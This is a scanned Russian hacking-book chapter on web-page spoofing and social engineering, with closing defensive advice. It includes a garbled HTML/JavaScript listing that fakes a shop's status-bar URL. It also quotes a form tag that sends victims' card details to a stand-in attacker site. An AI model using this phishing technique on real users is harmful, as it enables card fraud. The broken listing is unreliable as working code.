На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Подмена Web-страниц

Все описанные выше атаки могут сильно испортить нервы беспечного Web-путешественника, но, как правило, дело только этим и ограничивается - реаль­ный вред с помощью загруженных с Web-страницей враждебных аплетов и сце­нариев нанести достаточно сложно. Подобные атаки практически не опасны, если защита Web-браузера настроена на блокирование не сертифицированных элемен­тов ActiveX, и не выполняет в автоматическом режиме загруженные сценарии.
Однако имеется другая разновидность хакинга, основанная исключительно на мошенничестве, и ориентированная на извлечение финансовых средств у всех тех личностей, которые, стремясь идти в ногу со временем, обзаводятся кре­дитными карточками, счетами в Интернет-банках, используя их для покупок в Интернет-магазинах и т.д. При этом мало кто из счастливых обладателей
Интернет-карточек представляет, как работает механизм, обслуживающий их
покупки. Многие вообще не интересуются, как будут использоваться владель­цами виртуального магазина переданные им совершенно конфиденциальные данные - номер и другие платежные реквизиты кредитной карточки.
Все это - сущий клад для хакера, поскольку все что нужно сделать для обмана покупателей - это создать Web-сайт, копирующий внешний вид электронного магазина известной фирмы. Далее, распространив ссылки на этот сайт по всему Интернету, хакер может без проблем продавать виртуальный воздух и снимать деньги со счетов доверчивых посетителей.
Другая возможность, которую открывает для хакеров фальсификация Web-страниц - предоставление возможностей для загрузки злонамеренных про­грамм. Например, вместо загрузки нового пакета обновления системы Windows с Web-сайта Microsoft вы можете загрузить и запустить троянского коня напо­добие уже упоминавшейся программы NetBus.
Сейчас мы опишем технику фальсификации имитирующего виртуаль-
ный по продаже «виртуального воздуха» всем богатеньким и тупым
мерам». Эта техника достаточно проста и заключается в помещении на Web-странице злоумышленника ссылки на сценарий, генерирующий прямо на компь­ютере пользователя фальсифицированный ресурс. В листинге 8.7 приведен при­мер кода HTML, реализующего фальсифицированный Интернет-магазин.
Всемирно известная фирма Bubliki&Baranki предлагает Вашему вни­манию продукт который сделает вашу жизнь гораздо лучше! Просто <А HREF=« javascript:var а;« onclick="f alsify()-onMouseOver="window.status- 'http: //www.Bubliki&Barankicom'; return "window,status=""> щелкните здесь, </A> и перейдите к страничке заказа фирмы Bubliki&Baranki!
</BODY> </HTML>
При загрузке кода из листинга 8.7 браузер IE 5 отобразит страницу, представ­ленную на 3.
Обратите внимание на отображае­мый в строке состояния адрес ссыл­ки - http://www.Bubliki&Baranki.com
и на текст заголовка окна браузера -Фирма    Rog&Kopito предлагает.
Посетитель Web-сайта компании Rog&Kopito может заинтересоваться новым программным продуктом из­вестной компании Bubliki&Baranki, но покупка программы с Web-сайта компании Rog&Kopito может вы­звать у него смутные подозрения. (Надеюсь, вы понимаете, что назва­ния компаний здесь и в последую­щих главах не имеют отношение к реальным фирмам и придуманы только для иллюстрации.) Поэтому посетителю предоставляется ссылка, якобы приглашающая его перейти на Web-сайт компании Bubliki&Baranki. После щелчка мышью на ссылке встроенный в страничку сценарий ото­бражает фальсифицированную Web-
страничку, представленную на 4.
Фальсифицированная Web-страничка на 4 предлагает посетителю
ввести  свои идентификационные
данные вместе с номером кредитной карточки для оплаты покупки по Ин­тернету. Щелчок на кнопке Отпра­вить отсылает эти очень вкусные
данные как это видно из тега формы в сценарии
Web-странички, помещенной на сервере компании Rog&Kopito:
<FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'
method >
Если пользователь не обратит внимания на мелкую деталь - строку Адрес (Address) с несколько странным содержимым, он может и не заметить подмены реального магазина фальсифицированным «Шопом», в результате которой но­мер его кредитной карточки перекочует в базу данных злоумышленников со всеми, как говорится, вытекающими последствиями.
В старых версиях браузера IE можно было без проблем манипули­ровать строкой Address из сценария Javascript. Хакеры легко скрывали содержимое этой строки ложным адресом URL. Для ил­люстрации кода HTML здесь был использован браузер IE 6, кото­рый весьма затрудняет подобные действия; более того, IE 6 пре­дупреждает о наличии в коде HTML средств для манипулирования отображаемыми данными. Так что будьте начеку!
Другой, не менее интересный способ перехвата конфиденциальных данных, которыми обменивается Web-браузер с сервером - это снифинг сетевых соеди­нений. Перехватывая передаваемые по сети пакеты с номерами кредитных кар­точек, паролями и прочими интересными сведениями, хакеры могут достичь очень многого, о чем мы еще расскажем далее в этой книге.
Методы социальной инженерии
Познакомившись с методами хакинга клиентов Интернета, вы, наверное, сами поняли, что во время путешествий по Web ухо следует держать востро. Недос­татки реализации программного обеспечения и некорректная настройка пара­метров системы защиты браузера позволяют хакеру вытворять прямо чудеса. Однако наиболее эффективным методом, очевидно, следует считать элементар­ное мошенничество, основанное на доверчивости и неопытности Web-путешественников.
В предыдущем разделе показано, как легко создать собственный вариант Web-магазина известной фирмы и начать продавать там виртуальный воздух в обмен на реальные деньги. Этим возможности хакера отнюдь не ограничивают­ся. Предложения «бесплатно» загрузить «чудо-программу», согласиться на за­грузку странички с аплетом без сертификата от доверенного провайдера, щелк­нуть на ссылке и просмотреть «глобальные» возможности различных сайтов -все это сразу же окружает пользователя, появившегося на сайте Интернета с
тщательно обезличенным авторством, но очень конкретными целями. Вот что из этого может получиться.
Загрузив и запустив без всякой проверки распаковку файла программы, вы мо­жете элементарно очистить свой жесткий диск, установить в компьютере трояна или заразить компьютер вирусом. А поддавшись на уговоры купить что-либо на Web-сайте, вы можете подвернуться атаке кардера - так называют хакеров, собирающих номера кредитных карточек у доверчивых простаков.
Основные средства защиты от всех этих напастей таковы:
• Никому не доверять. Все сайты, предлагающие платные услуги, должны иметь сертификат от надежного поставщика и обеспечивать защищенные со­единения по протоколу SSL.
• Регулярно обновлять Web-браузер и поддерживать настройки его системы защиты на должном уровне.
• Использовать антивирусы.
Всего этого может оказаться недостаточно, если вы столкнетесь с настоящим ха­кером, который владеет более серьезными приемами хакинга, чем описанные в этой главе. Однако для большинства случаев годятся и перечисленные выше меры.
В следующей главе мы углубимся в более изощренные методы хакинга, связан­ные с электронной почтой. Оказывается, что ныне можно получить такое пись­мецо, что от вас не потребуется вообще ничего, чтобы стать виртуальным рабом некоего умельца, специализирующегося на комбинации кодов почтовых посла­ний. Этими комбинациями мы и займемся.
Заключение
Клиент Web - это весьма притягательный для хакера объект. Ныне виртуальное
киберпространство можно сравнить разве что с территорией, на которой идет
непрерывное сражение за выживание. Чтобы победить в этом сражении, антиха­керу следует уметь защищаться, например, настраивать параметры системы за­щиты браузера и работать с антивирусными пакетами, проверяющими загру­жаемые из Web сценарии и Однако все это вам не поможет, если не помнить все время одну простую истину - будучи в Web не доверяйте НИКОМУ, НИЧЕМУ, НИГДЕ и НИКОГДА - и, быть может, обойдется.
Хакеру же следует учесть, что жизнь не стоит на месте и то, что вполне толково работало в версии 4 браузера IE и Netscape, ныне, в версиях 5 и 6 уже не функ­ционирует. Стало быть следует все время заботиться о совершенствовании своих умений, помня при этом, что другим людям ваши делишки могут и не понравиться.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика